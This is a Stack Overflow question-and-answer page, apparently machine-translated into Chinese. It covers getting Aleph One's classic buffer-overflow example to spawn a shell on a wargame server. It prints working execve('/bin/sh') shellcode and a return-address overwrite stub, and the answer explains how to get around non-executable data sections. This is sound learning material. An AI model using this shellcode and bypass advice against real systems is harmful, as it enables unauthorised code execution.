我一直在尝试运行 Aleph One 的示例以获得 BOF 并打开 shell。
这是 Aleph One 论文:http://insecure.org/stf/smashstack.html
这是简单的 C 代码(几乎位于论文的一半):
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
现在,我尝试在 SSH bash 中运行这个程序,但没有成功。
由于运行后没有任何反应,我猜测我只是没有写返回地址,所以我用GDB查看ret变量与实际返回地址之间的偏移量,发现是7。
为了检查自己,我尝试在 3、4、5、6 中增加 ret,确实,只有当我将第 10 行更改为:
ret = (int *)&ret + 7;
我遇到了段错误。
但是,我不明白为什么 bash 没有打开,而是出现了这个错误。
P.S 我在“logic smashthestack”SSH 服务器上运行(他们的挑战之一是 BOF):http://logic.smashthestack.org:88/
感谢帮助者。
最佳答案
来自 http://blog.markloiseau.com/2012/06/64-bit-linux-shellcode/ :
This stub is an updated version of the classic shellcode test stub, with one key difference: In the new stub, the shellcode is #defined at compile-time so it can be placed directly into the main routine by gcc’s preprocessor.
This is necessary because over time, Linux and GCC have become much more cautious about which sections of an executable file can contain executable code (opposed to non-executable variables). The traditional version of the program won’t work on newer versions of Linux:
The classic shellcode c stub will generate a segfault on newer systems because the shellcode[] character array is stored in the explicitly non-executable .rodata section of the ELF file. When the computer recasts the non-executable array as a function and tries to run it, the program crashes
. 还要注意编写 shellcode 的这些更改:
//old way
char[] shellcode ="shellcode..."
//new way
#define SHELLCODE "shellcode
关于c - 简单的缓冲区溢出和 shellcode 示例,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/20431174/